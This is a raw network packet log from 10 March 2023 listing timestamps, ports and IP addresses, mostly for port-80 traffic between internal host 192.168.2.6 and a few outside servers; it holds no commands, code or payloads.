                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.273994923 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.274043083 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.274044037 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.277483940 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.277538061 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.277625084 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.277664900 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.277693033 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.277736902 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.277770042 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.277946949 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.277998924 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.278038979 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.278078079 CET8049918108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.278130054 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.278167009 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.278238058 CET4991880192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.279645920 CET4988680192.168.2.696.91.204.114
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284168005 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284224987 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284271955 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284313917 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284440041 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284440041 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284472942 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284491062 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284514904 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284535885 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284539938 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284605980 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284635067 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.284712076 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.285296917 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.285350084 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.285398006 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.285444975 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.285505056 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.285542965 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.286144018 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.286199093 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.286247015 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.286302090 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.286338091 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.286365032 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288041115 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288095951 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288211107 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288258076 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288259029 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288295031 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288305044 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288319111 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288352966 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288362980 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.288404942 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289033890 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289083958 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289132118 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289180040 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289227962 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289268970 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289844990 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289891005 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289942980 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289993048 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290010929 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290038109 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290071011 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290730953 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290782928 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290805101 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290828943 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290832996 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290879011 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290884018 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.290935040 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.291358948 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.291529894 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.291579962 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.291604042 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.291626930 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.291634083 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.291677952 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.291711092 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.291737080 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.292370081 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.292423964 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.292470932 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.292520046 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.292536020 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.292572021 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.292597055 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.293199062 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.293263912 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.293375969 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.293406010 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.296901941 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.296952963 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297100067 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297139883 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297146082 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297194958 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297215939 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297244072 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297262907 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297291994 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297318935 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297367096 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297790051 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297835112 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297868967 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.297904968 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.298139095 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.298177958 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.298237085 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.298237085 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.298453093 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.298512936 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.298975945 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.299024105 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.299066067 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.299105883 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.299139023 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.299185038 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.299185038 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301110029 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301157951 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301203966 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301217079 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301217079 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301244974 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301254034 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301301956 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301472902 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301521063 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301536083 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301564932 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301573038 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301609993 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301625013 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.301664114 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.302341938 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.302390099 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.302422047 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.302432060 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.302448988 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.302469015 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.302490950 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.302570105 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.303666115 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.303714991 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.303760052 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.303771019 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.303771019 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.303802013 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.303843021 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.303870916 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.304056883 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.304101944 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.304126978 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.304138899 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.304150105 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.304197073 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.311968088 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.312019110 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.312062025 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.312104940 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.312135935 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.312165976 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.312171936 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.312211990 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.312251091 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.312366009 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.312366009 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.313240051 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320069075 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320117950 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320164919 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320214033 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320262909 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320275068 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320310116 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320314884 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320314884 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320360899 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320373058 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320400000 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320414066 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.320451975 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.333048105 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.333107948 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.333163023 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.333210945 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.333272934 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.333309889 CET8049958172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.333488941 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.333539963 CET4995880192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.424813032 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.424949884 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.425730944 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.425829887 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.493058920 CET4996080192.168.2.664.125.133.18
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.500843048 CET8049927217.19.237.54192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.500963926 CET4992780192.168.2.6217.19.237.54
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.516108990 CET804992396.127.180.42192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.516308069 CET4992380192.168.2.696.127.180.42
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.559298038 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.559328079 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.559345961 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.956130028 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.956166029 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.956226110 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.956264973 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.958806992 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.958966970 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.958992004 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.959013939 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.959068060 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.959124088 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.959214926 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.959295988 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.959636927 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.959666014 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.959798098 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.959827900 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.962490082 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.962682009 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.089698076 CET8049873103.3.1.161192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.089792967 CET4987380192.168.2.6103.3.1.161
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.090006113 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.090032101 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.090225935 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.090225935 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.094793081 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.094830990 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.095120907 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.095150948 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.104222059 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.104268074 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.104489088 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.104489088 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.113639116 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.113687992 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.113895893 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.113926888 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.122884989 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.122914076 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.123192072 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.123224974 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.132333994 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.132364988 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.132550001 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.132587910 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.142518044 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.142589092 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.142774105 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.142841101 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.151113033 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.151175976 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.151364088 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.151412010 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.160402060 CET804995974.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.160656929 CET4995980192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.161412001 CET804995974.208.215.199192.168.2.6
